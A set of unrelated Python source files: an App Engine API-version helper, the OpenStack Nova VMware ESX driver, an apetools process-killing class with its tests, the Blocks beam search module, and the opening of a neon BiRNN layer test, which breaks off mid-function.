"""Returns the runtime-specific or general list of supported runtimes.
The provided 'versions' dict contains a field called 'api_versions'
which is the list of default versions supported. This dict may also
contain a 'supported_api_versions' dict which lists api_versions by
runtime. This function will prefer to return the runtime-specific
api_versions list, but will default to the general list.
Args:
versions: dict of versions from app.yaml or /api/updatecheck server.
runtime: string of current runtime (e.g. 'go').
Returns:
List of supported api_versions (e.g. ['go1']).
"""
if 'supported_api_versions' in versions:
return versions['supported_api_versions'].get(
runtime, versions)['api_versions']
return versions['api_versions']
|
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright (c) 2011 Citrix Systems, Inc.
# Copyright 2011 OpenStack LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
A connection to the VMware ESX platform.
**Related Flags**
:vmwareapi_host_ip: IPAddress of VMware ESX server.
:vmwareapi_host_username: Username for connection to VMware ESX Server.
:vmwareapi_host_password: Password for connection to VMware ESX Server.
:vmwareapi_task_poll_interval: The interval (seconds) used for polling of
remote tasks
(default: 1.0).
:vmwareapi_api_retry_count: The API retry count in case of failure such as
network failures (socket errors etc.)
(default: 10).
"""
import time
from eventlet import event
from nova import context
from nova import db
from nova import exception
from nova import flags
from nova import log as logging
from nova.openstack.common import cfg
from nova import utils
from nova.virt import driver
from nova.virt.vmwareapi import error_util
from nova.virt.vmwareapi import vim
from nova.virt.vmwareapi import vim_util
from nova.virt.vmwareapi import vmops
LOG = logging.getLogger(__name__)
vmwareapi_opts = [
cfg.StrOpt('vmwareapi_host_ip',
default=None,
help='URL for connection to VMWare ESX host.Required if '
'connection_type is vmwareapi.'),
cfg.StrOpt('vmwareapi_host_username',
default=None,
help='Username for connection to VMWare ESX host. '
'Used only if connection_type is vmwareapi.'),
cfg.StrOpt('vmwareapi_host_password',
default=None,
help='Password for connection to VMWare ESX host. '
'Used only if connection_type is vmwareapi.'),
cfg.FloatOpt('vmwareapi_task_poll_interval',
default=5.0,
help='The interval used for polling of remote tasks. '
'Used only if connection_type is vmwareapi'),
cfg.IntOpt('vmwareapi_api_retry_count',
default=10,
help='The number of times we retry on failures, e.g., '
'socket error, etc. '
'Used only if connection_type is vmwareapi'),
cfg.StrOpt('vmwareapi_vlan_interface',
default='vmnic0',
help='Physical ethernet adapter name for vlan networking'),
]
FLAGS = flags.FLAGS
FLAGS.register_opts(vmwareapi_opts)
TIME_BETWEEN_API_CALL_RETRIES = 2.0
class Failure(Exception):
"""Base Exception class for handling task failures."""
def __init__(self, details):
self.details = details
def __str__(self):
return str(self.details)
def get_connection(_read_only):
"""Sets up the ESX host connection."""
host_ip = FLAGS.vmwareapi_host_ip
host_username = FLAGS.vmwareapi_host_username
host_password = FLAGS.vmwareapi_host_password
api_retry_count = FLAGS.vmwareapi_api_retry_count
if not host_ip or host_username is None or host_password is None:
raise Exception(_("Must specify vmwareapi_host_ip,"
"vmwareapi_host_username "
"and vmwareapi_host_password to use"
"connection_type=vmwareapi"))
return VMWareESXConnection(host_ip, host_username, host_password,
api_retry_count)
class VMWareESXConnection(driver.ComputeDriver):
"""The ESX host connection object."""
def __init__(self, host_ip, host_username, host_password,
api_retry_count, scheme="https"):
super(VMWareESXConnection, self).__init__()
session = VMWareAPISession(host_ip, host_username, host_password,
api_retry_count, scheme=scheme)
self._vmops = vmops.VMWareVMOps(session)
def init_host(self, host):
"""Do the initialization that needs to be done."""
# FIXME(sateesh): implement this
pass
def list_instances(self):
"""List VM instances."""
return self._vmops.list_instances()
def spawn(self, context, instance, image_meta, network_info,
block_device_mapping=None):
"""Create VM instance."""
self._vmops.spawn(context, instance, image_meta, network_info)
def snapshot(self, context, instance, name):
"""Create snapshot from a running VM instance."""
self._vmops.snapshot(context, instance, name)
def reboot(self, instance, network_info, reboot_type):
"""Reboot VM instance."""
self._vmops.reboot(instance, network_info)
def destroy(self, instance, network_info, block_device_info=None):
"""Destroy VM instance."""
self._vmops.destroy(instance, network_info)
def pause(self, instance):
"""Pause VM instance."""
self._vmops.pause(instance)
def unpause(self, instance):
"""Unpause paused VM instance."""
self._vmops.unpause(instance)
def suspend(self, instance):
"""Suspend the specified instance."""
self._vmops.suspend(instance)
def resume(self, instance):
"""Resume the suspended VM instance."""
self._vmops.resume(instance)
def get_info(self, instance):
"""Return info about the VM instance."""
return self._vmops.get_info(instance)
def get_diagnostics(self, instance):
"""Return data about VM diagnostics."""
return self._vmops.get_info(instance)
def get_console_output(self, instance):
"""Return snapshot of console."""
return self._vmops.get_console_output(instance)
def get_volume_connector(self, _instance):
"""Return volume connector information"""
# TODO(vish): When volume attaching is supported, return the
# proper initiator iqn and host.
return {
'ip': FLAGS.vmwareapi_host_ip,
'initiator': None,
'host': None
}
def attach_volume(self, connection_info, instance_name, mountpoint):
"""Attach volume storage to VM instance."""
pass
def detach_volume(self, connection_info, instance_name, mountpoint):
"""Detach volume storage to VM instance."""
pass
def get_console_pool_info(self, console_type):
"""Get info about the host on which the VM resides."""
return {'address': FLAGS.vmwareapi_host_ip,
'username': FLAGS.vmwareapi_host_username,
'password': FLAGS.vmwareapi_host_password}
def update_available_resource(self, ctxt, host):
"""This method is supported only by libvirt."""
return
def host_power_action(self, host, action):
"""Reboots, shuts down or powers up the host."""
raise NotImplementedError()
def host_maintenance_mode(self, host, mode):
"""Start/Stop host maintenance window. On start, it triggers
guest VMs evacuation."""
raise NotImplementedError()
def set_host_enabled(self, host, enabled):
"""Sets the specified host's ability to accept new instances."""
raise NotImplementedError()
def plug_vifs(self, instance, network_info):
"""Plug VIFs into networks."""
self._vmops.plug_vifs(instance, network_info)
def unplug_vifs(self, instance, network_info):
"""Unplug VIFs from networks."""
self._vmops.unplug_vifs(instance, network_info)
class VMWareAPISession(object):
"""
Sets up a session with the ESX host and handles all
the calls made to the host.
"""
def __init__(self, host_ip, host_username, host_password,
api_retry_count, scheme="https"):
self._host_ip = host_ip
self._host_username = host_username
self._host_password = host_password
self.api_retry_count = api_retry_count
self._scheme = scheme
self._session_id = None
self.vim = None
self._create_session()
def _get_vim_object(self):
"""Create the VIM Object instance."""
return vim.Vim(protocol=self._scheme, host=self._host_ip)
def _create_session(self):
"""Creates a session with the ESX host."""
while True:
try:
# Login and setup the session with the ESX host for making
# API calls
self.vim = self._get_vim_object()
session = self.vim.Login(
self.vim.get_service_content().sessionManager,
userName=self._host_username,
password=self._host_password)
# Terminate the earlier session, if possible ( For the sake of
# preserving sessions as there is a limit to the number of
# sessions we can have )
if self._session_id:
try:
self.vim.TerminateSession(
self.vim.get_service_content().sessionManager,
sessionId=[self._session_id])
except Exception, excep:
# This exception is something we can live with. It is
# just an extra caution on our side. The session may
# have been cleared. We could have made a call to
# SessionIsActive, but that is an overhead because we
# anyway would have to call TerminateSession.
LOG.debug(excep)
self._session_id = session.key
return
except Exception, excep:
LOG.critical(_("In vmwareapi:_create_session, "
"got this exception: %s") % excep)
raise exception.NovaException(excep)
def __del__(self):
"""Logs-out the session."""
# Logout to avoid un-necessary increase in session count at the
# ESX host
try:
self.vim.Logout(self.vim.get_service_content().sessionManager)
except Exception, excep:
# It is just cautionary on our part to do a logout in del just
# to ensure that the session is not left active.
LOG.debug(excep)
def _is_vim_object(self, module):
"""Check if the module is a VIM Object instance."""
return isinstance(module, vim.Vim)
def _call_method(self, module, method, *args, **kwargs):
"""
Calls a method within the module specified with
args provided.
"""
args = list(args)
retry_count = 0
exc = None
last_fault_list = []
while True:
try:
if not self._is_vim_object(module):
# If it is not the first try, then get the latest
# vim object
if retry_count > 0:
args = args[1:]
args = [self.vim] + args
retry_count += 1
temp_module = module
for method_elem in method.split("."):
temp_module = getattr(temp_module, method_elem)
return temp_module(*args, **kwargs)
except error_util.VimFaultException, excep:
# If it is a Session Fault Exception, it may point
# to a session gone bad. So we try re-creating a session
# and then proceeding ahead with the call.
exc = excep
if error_util.FAULT_NOT_AUTHENTICATED in excep.fault_list:
# Because of the idle session returning an empty
# RetrievePropertiesResponse and also the same is returned
# when there is say empty answer to the query for
# VMs on the host ( as in no VMs on the host), we have no
# way to differentiate.
# So if the previous response was also am empty response
# and after creating a new session, we get the same empty
# response, then we are sure of the response being supposed
# to be empty.
if error_util.FAULT_NOT_AUTHENTICATED in last_fault_list:
return []
last_fault_list = excep.fault_list
self._create_session()
else:
# No re-trying for errors for API call has gone through
# and is the caller's fault. Caller should handle these
# errors. e.g, InvalidArgument fault.
break
except error_util.SessionOverLoadException, excep:
# For exceptions which may come because of session overload,
# we retry
exc = excep
except Exception, excep:
# If it is a proper exception, say not having furnished
# proper data in the SOAP call or the retry limit having
# exceeded, we raise the exception
exc = excep
break
# If retry count has been reached then break and
# raise the exception
if retry_count > self.api_retry_count:
break
time.sleep(TIME_BETWEEN_API_CALL_RETRIES)
LOG.critical(_("In vmwareapi:_call_method, "
"got this exception: %s") % exc)
raise
def _get_vim(self):
"""Gets the VIM object reference."""
if self.vim is None:
self._create_session()
return self.vim
def _wait_for_task(self, instance_uuid, task_ref):
"""
Return a Deferred that will give the result of the given task.
The task is polled until it completes.
"""
done = event.Event()
loop = utils.LoopingCall(self._poll_task, instance_uuid, task_ref,
done)
loop.start(FLAGS.vmwareapi_task_poll_interval)
ret_val = done.wait()
loop.stop()
return ret_val
def _poll_task(self, instance_uuid, task_ref, done):
"""
Poll the given task, and fires the given Deferred if we
get a result.
"""
try:
task_info = self._call_method(vim_util, "get_dynamic_property",
task_ref, "Task", "info")
task_name = task_info.name
if task_info.state in ['queued', 'running']:
return
elif task_info.state == 'success':
LOG.debug(_("Task [%(task_name)s] %(task_ref)s "
"status: success") % locals())
done.send("success")
else:
error_info = str(task_info.error.localizedMessage)
LOG.warn(_("Task [%(task_name)s] %(task_ref)s "
"status: error %(error_info)s") % locals())
done.send_exception(exception.NovaException(error_info))
except Exception, excep:
LOG.warn(_("In vmwareapi:_poll_task, Got this error %s") % excep)
done.send_exception(excep)
|
|
#python
import re
# apetools
from apetools.baseclass import BaseClass
from apetools.tools import sleep
from apetools.commons import enumerations, expressions, errors
from apetools.parsers.oatbran import NAMED, STRING_START,SPACES, INTEGER
from apetools.commands.pscommand import PsGrep
from apetools.commands.topcommand import TopGrep
CYGWIN = STRING_START + SPACES + NAMED(n=expressions.PID_NAME,e=INTEGER)
operating_systems = enumerations.OperatingSystem
class KillAllError(errors.CommandError):
"""
A KillAllError is raised if the kill didn't succeed.
"""
class KillAll(BaseClass):
"""
A killall kills processes. The default operating system is linux
"""
def __init__(self, connection=None, name=None, time_to_sleep=0, level=None):
"""
:param:
- `name`: The name of a process to kill
- `time_to_sleep`: The number of seconds to wait for a process to die.
- `connection`: A connection to a device
- `level`: the signal level (as a positive integer)
"""
super(BaseClass, self).__init__()
self._logger = None
self.name = name
self._arguments = None
self.time_to_sleep = time_to_sleep
self._sleep = None
self._connection = None
self.connection = connection
self._grep = None
self._level = None
self.level = level
return
@property
def level(self):
"""
The signal level for ``kill``
"""
if self._level is None:
self._level = ''
return self._level
@level.setter
def level(self, level):
"""
Set the signal level (use None to reset it to the default)
:param:
- `level`: positive integer or None
"""
if level is not None:
self._level = "-{0}".format(level)
else:
self._level = level
return
@property
def connection(self):
"""
A connection to the device
"""
return self._connection
@connection.setter
def connection(self, connection):
"""
Sets the connection, resets the grep (since the OS may have changed)
:param:
- `connection` : a connection to the device (e.g. `SSHConnection`)
:postcondition: self._grep is None, self._connection is `connection`
"""
self._connection = connection
self._grep = None
return
@property
def grep(self):
"""
the parser for the process id's
"""
if self._grep is None:
if self.connection.operating_system == operating_systems.ios:
self._grep = TopGrep(self.connection)
else:
self._grep = PsGrep(self.connection)
return self._grep
@property
def sleep(self):
"""
A sleep object to pace the execution of commands on the device
:return: A sleep timer
"""
if self._sleep is None:
self._sleep = sleep.Sleep(self.time_to_sleep).run
return self._sleep
def kill(self, name, level=None):
"""
Tries to kill all matching processes
:param:
- `name`: the name of the process
- `level`: a signal level to override the set level
"""
if level is None:
level = self.level
kill_count = 0
for pid in self.grep(name):
self.logger.debug("killing: " + pid)
command = " {0} {1}".format(self.level, pid)
kill_count+= 1
self.logger.debug("kill " + command)
k_output, k_error = self.connection.kill(command)
for k_line in k_error:
if len(k_line) > 1:
self.logger.error(k_line)
return kill_count
def run(self, name=None, time_to_sleep=None):
"""
Executes the kill
:param:
- `name`: The process to kill
- `time_to_sleep`: Seconds between calls to the device
:raise: KillAllError if the process is still alive at the end
"""
if name is None:
name = self.name
if time_to_sleep is None:
time_to_sleep = self.time_to_sleep
self.logger.debug("process to kill: {0}".format(name))
kill_count = self.kill(name)
if not kill_count:
self.logger.info("No '{p}' processes found on {h}".format(h=self.connection.hostname,
p=name))
return
self.sleep(time_to_sleep)
# double-check to see if the process is dead
for pid in self.grep(name):
raise KillAllError("Unable to kill {0}".format(name))
self.logger.error(err)
self.logger.info("Killed {k} '{p}' processes on {h}".format(k=kill_count,
h=self.connection.hostname,
p=name))
return
def __call__(self, name=None, time_to_sleep=None):
"""
This is an alias to ``run`` to match the newer-style
:param:
- `name`: The process to kill
- `time_to_sleep`: Seconds between calls to the device
:raise: KillAllError if the process is still alive at the end
"""
self.run(name=name, time_to_sleep=time_to_sleep)
return
def __str__(self):
return "{0} ({2}):{1}".format(self.__class__.__name__, self.name, self.connection)
# end class KillAll
#python standard library
import unittest
from random import randrange, choice
#third-party
from mock import MagicMock, patch, call
from nose.tools import raises
class TestKillAll(unittest.TestCase):
def setUp(self):
self.connection = MagicMock()
self.kill = KillAll(connection=self.connection)
return
def test_set_connection(self):
"""
Does setting the connection re-set the grep?
"""
self.connection.operating_system = operating_systems.ios
self.assertIsInstance(self.kill.grep, TopGrep)
self.connection.operating_system = operating_systems.android
self.kill.connection = self.connection
self.assertIsInstance(self.kill.grep, PsGrep)
return
def test_kill_command(self):
"""
Will the correct kill command be called?
"""
pgrep = MagicMock()
self.connection.operating_system = operating_systems.linux
self.connection.kill.return_value = [""], [""]
# pids[0] is the first traversal over pids , pids[1] is the check for unkilled pids
pids = [['{0}'.format(randrange(1000)) for i in range(randrange(100))]] + [[]]
def side_effects(*args, **kwargs):
return pids.pop(0)
pgrep.side_effect = side_effects
expected = [call(" {0}".format(pid)) for pid in pids[0]]
self.kill._grep = pgrep
self.kill.run(name='emacs',
time_to_sleep=0)
self.assertEqual(self.connection.kill.call_args_list, expected)
return
@raises(KillAllError)
def test_failed_kill(self):
"""
Will a failed kill raise an error?
"""
pgrep = MagicMock()
self.connection.operating_system = operating_systems.linux
self.connection.kill.return_value = [""], [""]
pids = ['{0}'.format(randrange(1000)) for i in range(randrange(100))]
pgrep.return_value = pids
self.kill._grep = pgrep
self.kill.run(name='emacs',
time_to_sleep=0)
return
def test_call(self):
"""
Dose `__call__` do the same thing as `run`?
"""
pgrep = MagicMock()
self.connection.operating_system = operating_systems.linux
self.connection.kill.return_value = [""], [""]
# pids[0] is the first traversal over pids , pids[1] is the check for unkilled pids
pids = [['{0}'.format(randrange(1000)) for i in range(randrange(100))]] + [[]]
def side_effects(*args, **kwargs):
return pids.pop(0)
pgrep.side_effect = side_effects
# use the default kill level
self.kill.level = None
expected = [call(" {0}".format(pid)) for pid in pids[0]]
self.kill._grep = pgrep
self.kill(name='emacs',
time_to_sleep=0)
self.assertEqual(self.connection.kill.call_args_list, expected)
return
def test_set_level(self):
"""
If you set the level, will the command change?
"""
pgrep = MagicMock()
self.connection.kill.return_value = [""], [""]
level = randrange(100)
self.kill.level = level
self.assertEqual(self.kill.level, "-{0}".format(level))
# pids[0] is the first traversal over pids , pids[1] is the check for unkilled pids
pids = [['{0}'.format(randrange(1000)) for i in range(randrange(100))]] + [[]]
def side_effects(*args, **kwargs):
return pids.pop(0)
pgrep.side_effect = side_effects
expected = [call(" -{1} {0}".format(pid, level)) for pid in pids[0]]
self.kill._grep = pgrep
self.kill.kill(name='emacs')
self.assertEqual(self.connection.kill.call_args_list, expected)
return
def test_reset_level(self):
"""
Can you go back to the default level?
"""
pgrep = MagicMock()
self.connection.kill.return_value = [""], [""]
level = randrange(100)
self.kill.level = level
# reset here
self.kill.level = None
self.assertEqual(self.kill.level, "")
# pids[0] is the first traversal over pids , pids[1] is the check for unkilled pids
pids = [['{0}'.format(randrange(1000)) for i in range(randrange(100))]] + [[]]
def side_effects(*args, **kwargs):
return pids.pop(0)
pgrep.side_effect = side_effects
expected = [call(" {0}".format(pid)) for pid in pids[0]]
self.kill._grep = pgrep
self.kill.kill(name='emacs')
self.assertEqual(self.connection.kill.call_args_list, expected)
return
|
|
"""The beam search module."""
from collections import OrderedDict
from six.moves import range
import logging
import numpy
from picklable_itertools.extras import equizip
import theano
from theano import function
from blocks_extras.bricks.sequence_generator2 import SequenceGenerator
from blocks.filter import VariableFilter, get_application_call, get_brick
from blocks.graph import ComputationGraph
from blocks.roles import INPUT, OUTPUT
logger = logging.getLogger(__name__)
class CandidateNotFoundError(Exception):
pass
class BeamSearch(object):
"""Approximate search for the most likely sequence.
Beam search is an approximate algorithm for finding :math:`y^* =
argmax_y P(y|c)`, where :math:`y` is an output sequence, :math:`c` are
the contexts, :math:`P` is the output distribution of a
:class:`.SequenceGenerator`. At each step it considers :math:`k`
candidate sequence prefixes. :math:`k` is called the beam size, and the
sequence are called the beam. The sequences are replaced with their
:math:`k` most probable continuations, and this is repeated until
end-of-line symbol is met.
The beam search compiles quite a few Theano functions under the hood.
Normally those are compiled at the first :meth:`search` call, but
you can also explicitly call :meth:`compile`.
Parameters
----------
beam_size : int
The beam size.
samples : :class:`~theano.Variable`
An output of a sampling computation graph built by
:meth:`~blocks.brick.SequenceGenerator.generate`, the one
corresponding to sampled sequences.
See Also
--------
:class:`.SequenceGenerator`
Notes
-----
Sequence generator should use an emitter which has `probs` method
e.g. :class:`SoftmaxEmitter`.
Does not support dummy contexts so far (all the contexts must be used
in the `generate` method of the sequence generator for the current code
to work).
"""
def __init__(self, beam_size, samples):
self.beam_size = beam_size
# Extracting information from the sampling computation graph
cg = ComputationGraph(samples)
self.inputs = cg.inputs
self.generator = get_brick(samples)
if not isinstance(self.generator, SequenceGenerator):
raise ValueError
self.generate_call = get_application_call(samples)
if (not self.generate_call.application ==
self.generator.generate):
raise ValueError
self.inner_cg = ComputationGraph(self.generate_call.inner_outputs)
# Fetching names from the sequence generator
self.context_names = self.generator.generate.contexts
self.state_names = self.generator.generate.states
# Parsing the inner computation graph of sampling scan
self.contexts = [
VariableFilter(bricks=[self.generator],
name=name,
roles=[INPUT])(self.inner_cg)[0]
for name in self.context_names]
self.input_states = []
# Includes only those state names that were actually used
# in 'generate'
self.input_state_names = []
for name in self.generator.generate.states:
var = VariableFilter(
bricks=[self.generator], name=name,
roles=[INPUT])(self.inner_cg)
if var:
self.input_state_names.append(name)
self.input_states.append(var[0])
self.compiled = False
def _compile_context_computer(self):
self.context_computer = function(
self.inputs, self.contexts, on_unused_input='ignore')
def _compile_initial_state_computer(self):
# TODO: should be now extractable from the computation graph
initial_states = self.generator.initial_states(
1, as_dict=True,
**dict(equizip(self.context_names, self.contexts)))
self.initial_state_computer = function(
self.contexts, initial_states, on_unused_input='ignore')
def _compile_next_state_computer(self):
next_states = [VariableFilter(bricks=[self.generator],
name=name,
roles=[OUTPUT])(self.inner_cg)[-1]
for name in self.state_names]
next_outputs = VariableFilter(
applications=[self.generator.readout.sample],
name='samples')(self.inner_cg.variables)
self.next_state_computer = function(
self.contexts + self.input_states + next_outputs, next_states,
# This is temporarily required because `lm_logprobs` is a weird
# state which is not used to compute next state, but used to
# compute the next output.
on_unused_input='ignore')
def _compile_logprobs_computer(self):
# This filtering should return identical variables
# (in terms of computations) variables, and we do not care
# which to use.
scores = self.generator.readout.scores(
**dict(zip(self.context_names, self.contexts) +
zip(self.input_state_names, self.input_states)))
self.logprobs_computer = function(
self.contexts + self.input_states, -scores,
on_unused_input='ignore')
def compile(self):
"""Compile all Theano functions used."""
self._compile_context_computer()
self._compile_initial_state_computer()
self._compile_next_state_computer()
self._compile_logprobs_computer()
self.compiled = True
def compute_contexts(self, inputs):
"""Computes contexts from inputs.
Parameters
----------
inputs : dict
Dictionary of input arrays.
Returns
-------
A {name: :class:`numpy.ndarray`} dictionary of contexts ordered
like `self.context_names`.
"""
contexts = self.context_computer(*[inputs[var]
for var in self.inputs])
return OrderedDict(equizip(self.context_names, contexts))
def compute_initial_states(self, contexts):
"""Computes initial states.
Parameters
----------
contexts : dict
A {name: :class:`numpy.ndarray`} dictionary of contexts.
Returns
-------
A {name: :class:`numpy.ndarray`} dictionary of states ordered like
`self.state_names`.
"""
return self.initial_state_computer(*list(contexts.values()))
def compute_logprobs(self, contexts, states):
"""Compute log probabilities of all possible outputs.
Parameters
----------
contexts : dict
A {name: :class:`numpy.ndarray`} dictionary of contexts.
states : dict
A {name: :class:`numpy.ndarray`} dictionary of states.
Returns
-------
A :class:`numpy.ndarray` of the (beam size, number of possible
outputs) shape.
"""
input_states = [states[name] for name in self.input_state_names]
return self.logprobs_computer(*(list(contexts.values()) +
input_states))
def compute_next_states(self, contexts, states, outputs):
"""Computes next states.
Parameters
----------
contexts : dict
A {name: :class:`numpy.ndarray`} dictionary of contexts.
states : dict
A {name: :class:`numpy.ndarray`} dictionary of states.
outputs : :class:`numpy.ndarray`
A :class:`numpy.ndarray` of this step outputs.
Returns
-------
A {name: numpy.array} dictionary of next states.
"""
input_states = [states[name] for name in self.input_state_names]
next_values = self.next_state_computer(*(list(contexts.values()) +
input_states + [outputs]))
return OrderedDict(equizip(self.state_names, next_values))
@staticmethod
def _smallest(matrix, k):
"""Find k smallest elements of a matrix.
Parameters
----------
matrix : :class:`numpy.ndarray`
The matrix.
k : int
The number of smallest elements required.
Returns
-------
Tuple of ((row numbers, column numbers), values).
"""
flatten = matrix.flatten()
if flatten.shape[0] > k:
args = numpy.argpartition(flatten, k)[:k]
else:
args = numpy.arange(flatten.shape[0])
args = args[numpy.argsort(flatten[args])]
return numpy.unravel_index(args, matrix.shape), flatten[args]
def search(self, input_values, eol_symbol, max_length,
ignore_first_eol=False, as_arrays=False,
char_discount=0, round_to_inf=1e9,
stop_on='patience', consider_all_eos=False,
validate_solution_function=None):
"""Performs beam search.
If the beam search was not compiled, it also compiles it.
Parameters
----------
input_values : dict
A {:class:`~theano.Variable`: :class:`~numpy.ndarray`}
dictionary of input values. The shapes should be
the same as if you ran sampling with batch size equal to
`beam_size`. Put it differently, the user is responsible
for duplicaling inputs necessary number of times, because
this class has insufficient information to do it properly.
eol_symbol : int
End of sequence symbol, the search stops when the symbol is
generated.
max_length : int
Maximum sequence length, the search stops when it is reached.
ignore_first_eol : bool, optional
When ``True``, the end if sequence symbol generated at the
first iteration are ignored. This useful when the sequence
generator was trained on data with identical symbols for
sequence start and sequence end.
as_arrays : bool, optional
If ``True``, the internal representation of search results
is returned, that is a (matrix of outputs, mask,
costs of all generated outputs) tuple.
Returns
-------
outputs : list of lists of ints
A list of the `beam_size` best sequences found in the order
of decreasing likelihood.
costs : list of floats
A list of the costs for the `outputs`, where cost is the
negative log-likelihood.
"""
if validate_solution_function:
raise ValueError
if not self.compiled:
self.compile()
contexts = self.compute_contexts(input_values)
large_contexts = OrderedDict(contexts)
states = self.compute_initial_states(contexts)
# This array will store all generated outputs, including those from
# previous step and those from already finished sequences.
all_outputs = -1 * numpy.ones((1, 1), dtype='int64')
all_costs = numpy.zeros_like(all_outputs, dtype=theano.config.floatX)
done = []
min_cost = 1000
for i in range(max_length):
if len(states.values()[0].flatten()) == 0:
break
if stop_on == 'patience':
done = sorted(done, key=lambda x: x[1][-1] - char_discount * len(x[1]))
done = done[:self.beam_size]
if done:
current_best_cost = done[0][1][-1] - char_discount * len(done[0][1])
if current_best_cost < min_cost:
min_cost = current_best_cost
patience = 30
else:
patience -= 1
if patience == 0:
break
elif stop_on == 'optimistic_future_cost':
# stop only when we have at least self.beam_size sequences,
# that are all cheaper than we can possibly obtain by extending
# other ones
if (len(done) >= self.beam_size):
optimistic_future_cost = (all_costs[-1, :].min() -
char_discount * max_length)
last_in_done = done[self.beam_size - 1][1]
# note: done is sorted by the cost with char discount subtracted
last_in_done_cost = (last_in_done[-1] -
char_discount * len(last_in_done))
if last_in_done_cost < optimistic_future_cost:
break
else:
raise ValueError('Unknown stopping criterion {}'.format(stop_on))
# Broadcasting of contexts, should happen only once
if large_contexts.values()[0].shape[1] != states.values()[0].shape[0]:
# logger.debug("Reshape contexts 1")
for name, ctx in contexts.items():
large_contexts[name] = numpy.take(ctx, [0]*states.values()[0].shape[0], axis=1)
logprobs = self.compute_logprobs(large_contexts, states)
assert numpy.isfinite(logprobs).all()
next_costs = (all_costs[-1, :, None] + logprobs)
if consider_all_eos:
for idx in range(self.beam_size):
candidate = numpy.concatenate(
[all_outputs[:, idx], [eol_symbol]])
costs = numpy.concatenate([all_costs[:, idx],
[next_costs[idx, eol_symbol]]])
done.append((candidate, costs))
(indices, outputs), chosen_costs = self._smallest(
next_costs, self.beam_size)
# Rearrange everything
for name in states:
states[name] = numpy.take(states[name], indices, axis=0)
all_outputs = numpy.take(all_outputs, indices, axis=1)
all_costs = numpy.take(all_costs, indices, axis=1)
if large_contexts.values()[0].shape[1] != states.values()[0].shape[0]:
# logger.debug('Reshape contexts 2')
for name, ctx in contexts.items():
large_contexts[name] = numpy.take(ctx, [0]*states.values()[0].shape[0], axis=1)
states = self.compute_next_states(large_contexts, states, outputs)
all_outputs = numpy.vstack([all_outputs, outputs[None, :]])
all_costs = numpy.vstack([all_costs, chosen_costs[None, :]])
mask = outputs != eol_symbol
if ignore_first_eol and i == 0:
mask[:] = 1
for idx in numpy.where(
(all_outputs[-1] == eol_symbol) &
(all_costs[-1] - all_costs[-2] < round_to_inf))[0]:
if (validate_solution_function is None or
validate_solution_function(input_values,
all_outputs[:, idx])):
done.append((all_outputs[:, idx], all_costs[:, idx]))
unfinished = numpy.where(mask == 1)[0]
for name in states:
states[name] = numpy.take(states[name], unfinished, axis=0)
all_outputs = numpy.take(all_outputs, unfinished, axis=1)
all_costs = numpy.take(all_costs, unfinished, axis=1)
if not done:
done = [(all_outputs[:, i], all_costs[:, i])
for i in range(all_outputs.shape[1])]
done = sorted(done, key=lambda x: x[1][-1] - char_discount * len(x[1]))
max_len = max((seq[0].shape[0] for seq in done))
all_outputs = numpy.zeros((max_len, len(done)))
all_masks = numpy.zeros((max_len, len(done)))
all_costs = numpy.zeros((max_len, len(done)))
for i, (seq, cost) in enumerate(done):
all_outputs[:len(seq), i] = seq
all_masks[:len(seq), i] = 1
all_costs[:len(cost), i] = cost
all_costs[len(cost):, i] = cost[-1]
all_outputs = all_outputs[1:]
all_masks = all_masks[1:]
all_costs = all_costs[1:] - all_costs[:-1]
result = all_outputs, all_masks, all_costs
if as_arrays:
return result
return self.result_to_lists(result)
@staticmethod
def result_to_lists(result):
outputs, masks, costs = [array.T for array in result]
outputs = [list(output[:int(mask.sum())])
for output, mask in equizip(outputs, masks)]
costs = list(costs.T.sum(axis=0))
return outputs, costs
|
|
# ----------------------------------------------------------------------------
# Copyright 2015-2016 Nervana Systems Inc.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ----------------------------------------------------------------------------
'''
Test of the BiRNN layer
'''
from builtins import zip
import itertools as itt
import numpy as np
from numpy import concatenate as con
from neon import NervanaObject
from neon.initializers.initializer import GlorotUniform
from neon.layers.recurrent import BiRNN, Recurrent, get_steps, BiSum, BiBNRNN
from neon.transforms import Rectlinclip
from utils import allclose_with_out
def pytest_generate_tests(metafunc):
bsz_rng = [1, 4]
if 'fargs' in metafunc.fixturenames:
fargs = []
if metafunc.config.option.all:
seq_rng = [2, 3, 4]
inp_rng = [3, 5, 10]
out_rng = [3, 5, 10, 1152]
else:
seq_rng = [3]
inp_rng = [5]
out_rng = [10, 1152]
fargs = itt.product(seq_rng, inp_rng, out_rng, bsz_rng)
metafunc.parametrize('fargs', fargs)
def test_biRNN_fprop_rnn(backend_default, fargs, deltas_buffer):
# basic sanity check with 0 weights random inputs
seq_len, input_size, hidden_size, batch_size = fargs
in_shape = (input_size, seq_len)
out_shape = (hidden_size, seq_len)
NervanaObject.be.bsz = batch_size
# setup the bi-directional rnn
init_glorot = GlorotUniform()
birnn = BiRNN(hidden_size, activation=Rectlinclip(slope=0), init=init_glorot)
birnn.configure(in_shape)
birnn.prev_layer = True
birnn.allocate()
# setup the bi-directional rnn
init_glorot = GlorotUniform()
rnn = Recurrent(hidden_size, activation=Rectlinclip(slope=0), init=init_glorot)
rnn.configure(in_shape)
rnn.prev_layer = True
rnn.allocate()
# same weight for bi-rnn backward and rnn weights
nout = hidden_size
birnn.W_input_b[:] = birnn.W_input_f
birnn.W_recur_b[:] = birnn.W_recur_f
birnn.b_b[:] = birnn.b_f
birnn.dW[:] = 0
rnn.W_input[:] = birnn.W_input_f
rnn.W_recur[:] = birnn.W_recur_f
rnn.b[:] = birnn.b_f
rnn.dW[:] = 0
# inputs - random and flipped left-to-right inputs
lr = np.random.random((input_size, seq_len * batch_size))
lr_rev = list(reversed(get_steps(lr.copy(), in_shape)))
rl = con(lr_rev, axis=1)
inp_lr = birnn.be.array(lr)
inp_rl = birnn.be.array(rl)
